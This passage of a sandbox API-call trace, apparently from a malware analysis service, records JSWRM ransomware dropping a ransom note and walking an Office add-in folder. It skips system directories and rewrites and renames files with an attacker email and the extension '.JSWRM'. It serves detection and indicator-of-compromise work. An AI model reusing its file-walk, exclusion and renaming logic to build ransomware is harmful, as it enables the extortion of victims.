cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0125.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x278330 [0125.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0125.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x27a100 [0125.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0125.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0125.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0125.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0125.820] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ca\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ca\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0125.821] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.821] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0125.822] CloseHandle (hObject=0x314) returned 1 [0125.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0125.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27a100 | out: hHeap=0x1e0000) returned 1 [0125.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0125.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0125.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0125.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0125.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0125.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0125.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0125.823] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ca\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ca\\jswrm-decrypt.hta")) returned 0x20 [0125.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0125.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0125.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0125.823] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ca\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6296213, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16605845, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x41a7a5b5, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName=".", cAlternateFileName="")) returned 0x231b40 [0125.823] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0125.823] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6296213, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16605845, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x41a7a5b5, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="..", cAlternateFileName="")) returned 1 [0125.823] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0125.823] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0125.823] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41a7a5b5, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x41a7a5b5, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x41a7a5b5, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0125.823] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0125.823] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0125.823] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0125.823] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0125.823] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0125.823] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0125.823] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0125.823] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0125.823] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0125.823] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0125.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0125.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0125.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0125.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0125.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0125.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0125.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0125.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0125.824] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x16605845, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x16605845, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16605845, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10f2, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="LocalizedStrings.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0125.824] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2=".") returned 1 [0125.824] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="..") returned 1 [0125.824] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="...") returned 1 [0125.824] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="windows") returned -1 [0125.824] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="recovery") returned -1 [0125.824] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="perflogs") returned -1 [0125.824] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="documents and settings") returned 1 [0125.824] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="$RECYCLE.BIN") returned 1 [0125.824] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="system volume information") returned -1 [0125.824] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="msocache") returned -1 [0125.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0125.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0125.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x241010, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0125.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0125.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0125.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0125.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x240f48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0125.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0125.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0125.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0125.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0125.825] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ca\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ca\\localizedstrings.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0125.826] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=4338) returned 1 [0125.826] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10f0) returned 0x278330 [0125.826] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x10f0, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x10f0, lpOverlapped=0x0) returned 1 [0125.827] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.828] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x10f0, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x10f0, lpOverlapped=0x0) returned 1 [0125.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0125.828] CloseHandle (hObject=0x338) returned 1 [0125.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ee50 [0125.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0125.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0125.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0125.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0125.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0125.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0125.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0125.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0125.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0125.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0125.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0125.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0125.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0125.828] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ca\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ca\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ca\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ca\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0125.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0125.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ee50 | out: hHeap=0x1e0000) returned 1 [0125.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0125.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0125.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0125.829] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa4733b6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa4733b6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa4995f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xd028, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Common.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0125.829] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2=".") returned 1 [0125.829] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="..") returned 1 [0125.829] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="...") returned 1 [0125.830] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="windows") returned -1 [0125.830] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="recovery") returned -1 [0125.830] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="perflogs") returned -1 [0125.830] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="documents and settings") returned 1 [0125.830] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.830] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="system volume information") returned -1 [0125.830] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="msocache") returned -1 [0125.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0125.830] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0125.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.830] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x22cdc8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0125.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0125.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0125.830] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0125.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0125.830] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d0d8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0125.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0125.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23dee0 [0125.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0125.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0125.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.830] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbd2face, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbd2face, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbd55d11, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x38af0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cAlternateFileName="MIDF86~1.DLL")) returned 1 [0125.830] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2=".") returned 1 [0125.830] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="..") returned 1 [0125.830] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="...") returned 1 [0125.830] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="windows") returned -1 [0125.830] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="recovery") returned -1 [0125.830] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="perflogs") returned -1 [0125.830] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="documents and settings") returned 1 [0125.830] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.830] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="system volume information") returned -1 [0125.830] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="msocache") returned -1 [0125.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0125.830] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0125.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dba8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0125.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0125.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0125.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0125.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0125.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x20d728, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0125.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0125.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ede0 [0125.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0125.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0125.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0125.831] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x680214, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x680214, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x680214, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13a90, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cAlternateFileName="MI038C~1.DLL")) returned 1 [0125.831] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2=".") returned 1 [0125.831] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="..") returned 1 [0125.831] lstrcmpiW 